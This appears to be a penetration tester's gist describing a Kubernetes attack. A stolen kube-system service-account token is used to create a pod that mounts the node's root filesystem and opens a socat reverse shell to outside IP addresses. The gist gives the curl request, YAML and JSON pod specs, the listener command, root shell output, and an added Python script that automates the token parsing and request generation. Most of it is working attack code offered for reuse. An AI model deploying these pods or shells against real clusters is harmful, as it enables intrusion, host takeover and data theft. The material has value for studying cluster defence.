@dualfade
Last active April 26, 2020 05:33
Post request to cluster --
Most articles talk about using "default" as the namespace;
this target needed a very specific namespace because of the token and the privileges it carried.
% curl -sk -v -H 'Authorization: Bearer eyJhbHbiOiJSUzI1NiIsImtpZCI6InpR[full_jwt]4bGRe83bt6f_jPs1RXMKt3RnQd5ugveZfw' 'https://poc.somehackeddomain.com:6443/api/v1/namespaces/HACKED_NAMESPACE/pods' -H 'Content-Type: application/json' -d @5h3ll3x.json
yaml pod template --
Convert to json for proper injection --
Obviously the token has to have enough privileges to create a pod with a hostPath volume (PodSecurityPolicy or other admission control will reject it otherwise) --
In this particular pen-test, AWS was breached, the kube-system JWT was compromised, and then the JSON reverse-shell pod was injected.
Rev shell notes --
ngrok tcp 9000 (the pod connects to the public ngrok TCP endpoint, which forwards to the local socat listener on 9000)
% cat 5h3ll3x.yaml
apiVersion: v1
kind: Pod
metadata:
  name: 5h3ll3x
spec:
  containers:
  - name: 5h3ll3x
    image: danilonc/blackarch
    command: ["/bin/sh"]
    args: ["-c", 'sudo pacman -S socat --noconfirm; socat tcp-connect:3.135.90.78:18896 exec:"bash -li",pty,stderr,setsid,sigint,sane; sleep 100000']
    volumeMounts:
    - name: logs
      mountPath: /var/log/host
  volumes:
  - name: logs
    hostPath:
      path: /
      type: Directory
% cat 5h3ll3x.json
{
  "apiVersion": "v1",
  "kind": "Pod",
  "metadata": {
    "name": "5h3ll3x"
  },
  "spec": {
    "containers": [
      {
        "name": "5h3ll3x",
        "image": "danilonc/blackarch",
        "command": [
          "/bin/sh"
        ],
        "args": [
          "-c",
          "sudo pacman -S socat --noconfirm; socat tcp-connect:3.19.114.185:18896 exec:\"bash -li\",pty,stderr,setsid,sigint,sane; sleep 100000"
        ],
        "volumeMounts": [
          {
            "name": "logs",
            "mountPath": "/var/log/host"
          }
        ]
      }
    ],
    "volumes": [
      {
        "name": "logs",
        "hostPath": {
          "path": "/",
          "type": "Directory"
        }
      }
    ]
  }
}
Wait for incoming shell --
% socat file:`tty`,raw,echo=0 tcp-listen:9000
[user@5h3ll3x ~]$ id
uid=1000(user) gid=1000(user) groups=1000(user),977(sudo)
[user@5h3ll3x ~]$ sudo su -
[root@5h3ll3x ~]#
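The whole flow above (namespace-scoped token, hostPath pod spec, POST to the right namespace) as an added example; this is not code from the gist. It reads the namespace and service account out of the stolen token's `sub` claim instead of guessing "default", builds the same pod spec as 5h3ll3x.json, and emits a SelfSubjectAccessReview request (what `kubectl auth can-i create pods -n NS` sends) before the pod create. The sample token, the API server URL `https://poc.example:6443`, the callback address 203.0.113.10:18896 and the names `deploy-bot` / `5h3ll3x.json` are constructed for the demo; nothing here touches a real cluster.

```python
# Added example (not from the original gist): derive the namespace the stolen
# token belongs to, generate the hostPath pod spec, emit the API requests.
# Token, API server URL and callback address are constructed for the demo.
import base64
import json
import shlex


def _b64url(raw):
    """Base64url without padding, as used for JWT segments."""
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


# Constructed sample token shaped like a Kubernetes service-account JWT.
# The signature is junk: we only read claims, the API server does the verifying.
SAMPLE_TOKEN = ".".join([
    _b64url(json.dumps({"alg": "RS256", "kid": "demo"}).encode()),
    _b64url(json.dumps({
        "iss": "kubernetes/serviceaccount",
        "kubernetes.io/serviceaccount/namespace": "kube-system",
        "kubernetes.io/serviceaccount/service-account.name": "deploy-bot",
        "sub": "system:serviceaccount:kube-system:deploy-bot",
    }).encode()),
    _b64url(b"not-a-real-signature"),
])


def jwt_claims(token):
    """Decode the JWT payload without verifying it (we only want the claims)."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("not a JWT")
    payload = parts[1] + "=" * (-len(parts[1]) % 4)  # restore base64 padding
    return json.loads(base64.urlsafe_b64decode(payload))


def token_identity(token):
    """Return (namespace, service_account) from the `sub` claim.

    Legacy and bound service-account tokens both carry
    sub = system:serviceaccount:<namespace>:<name>, so the namespace the
    token is scoped to is known before anything is posted.
    """
    sub = jwt_claims(token).get("sub", "")
    prefix = "system:serviceaccount:"
    if not sub.startswith(prefix):
        raise ValueError("not a service-account token: sub=%r" % sub)
    namespace, name = sub[len(prefix):].split(":", 1)
    return namespace, name


def can_i_create_pods(namespace):
    """SelfSubjectAccessReview body, same as `kubectl auth can-i create pods -n NS`."""
    return {
        "apiVersion": "authorization.k8s.io/v1",
        "kind": "SelfSubjectAccessReview",
        "spec": {"resourceAttributes": {
            "namespace": namespace, "verb": "create", "resource": "pods"}},
    }


def hostpath_pod(name, image, callback_host, callback_port, mount_path="/var/log/host"):
    """Pod spec matching the gist: install socat, call back, mount the node's /."""
    shell = ("sudo pacman -S socat --noconfirm; "
             f'socat tcp-connect:{callback_host}:{callback_port} '
             'exec:"bash -li",pty,stderr,setsid,sigint,sane; sleep 100000')
    return {
        "apiVersion": "v1",
        "kind": "Pod",
        "metadata": {"name": name},
        "spec": {
            "containers": [{
                "name": name,
                "image": image,
                "command": ["/bin/sh"],
                "args": ["-c", shell],
                "volumeMounts": [{"name": "host", "mountPath": mount_path}],
            }],
            # hostPath "/" is exactly what PodSecurityPolicy / Pod Security
            # Admission (baseline, restricted) reject: the privilege the gist
            # says the token must have.
            "volumes": [{"name": "host",
                         "hostPath": {"path": "/", "type": "Directory"}}],
        },
    }


def request_plan(api_server, token, pod_file):
    """Two curl commands: check the permission first, then create the pod."""
    namespace, _sa = token_identity(token)
    auth = shlex.quote("Authorization: Bearer " + token)
    review = shlex.quote(json.dumps(can_i_create_pods(namespace)))
    base = "curl -sk -H %s -H 'Content-Type: application/json'" % auth
    return [
        "%s -X POST %s/apis/authorization.k8s.io/v1/selfsubjectaccessreviews -d %s"
        % (base, api_server, review),
        "%s -X POST %s/api/v1/namespaces/%s/pods -d @%s"
        % (base, api_server, namespace, shlex.quote(pod_file)),
    ]


if __name__ == "__main__":
    ns, sa = token_identity(SAMPLE_TOKEN)
    print("token belongs to", ns + "/" + sa)
    pod = hostpath_pod("5h3ll3x", "danilonc/blackarch", "203.0.113.10", 18896)
    print(json.dumps(pod, indent=2))  # write this out as 5h3ll3x.json
    for cmd in request_plan("https://poc.example:6443", SAMPLE_TOKEN, "5h3ll3x.json"):
        print(cmd)
```

The access review answers with `status.allowed`; if that is false for `create pods` in the token's own namespace, posting the pod will fail too and there is no point burning the token on a noisy 403. The YAML-to-JSON step is a convenience rather than a requirement: the API server also accepts request bodies with `Content-Type: application/yaml`.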
Just some notes --
If you run into formatting issues, these two sites clean up YAML/JSON for Kubernetes well (the pod spec carries nothing sensitive, but keep tokens out of them) --
https://onlineyamltools.com/convert-yaml-to-json
https://onlineyamltools.com/prettify-yaml
Good refs --
https://www.cyberark.com/threat-research-blog/kubernetes-pentest-methodology-part-1/
https://www.cyberark.com/threat-research-blog/kubernetes-pentest-methodology-part-2/
https://www.cyberark.com/threat-research-blog/kubernetes-pentest-methodology-part-3/
https://www.roguesecurity.in/2020/03/11/attacking-and-defending-kubernetes-cluster/
https://github.com/geerlingguy/k8s-pod-rbac-breakout
https://rhinosecuritylabs.com/aws/cloud-container-attack-tool/
https://www.devopsgroup.com/blog/hacking-aws-blog/